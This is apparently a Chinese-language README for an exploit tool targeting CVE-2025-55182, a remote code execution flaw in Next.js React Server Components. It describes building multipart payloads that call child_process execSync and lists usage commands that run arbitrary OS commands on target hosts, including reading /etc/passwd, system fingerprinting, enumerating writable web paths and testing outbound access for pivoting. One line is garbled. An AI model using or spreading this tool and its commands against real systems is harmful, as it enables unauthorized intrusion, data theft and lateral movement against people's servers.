CVE-2025-55182 高级扫描器
一款针对 CVE-2025-55182 的全功能利用工具——远程代码执行,攻击目标为 Next.js 中的 React 服务端组件。
该扫描器自动构造 multipart 载荷,并利用 process.mainModule.require('child_process').execSync() 在易受攻击的实例上实现任意操作系统命令执行。
https://)chmod +x scanner.sh
# 默认扫描(执行 'id')
./scanner.sh -d vulnerable-app.com
# 自定义命令执行
./scanner.sh -d vulnerable-app.com -c "whoami"
# 显式指定协议
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
# 验证 RCE
./scanner.sh -d shop.example.com
# 系统指纹识别
./scanner.sh -d shop.example.com -c "uname -a"
# 枚举可写路径
./scanner.sh -d shop.example.com -c "ls -la /var/www"
# 辅助跳板——检查出站访问
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
欢迎通过 mailto:[email protected] 联系我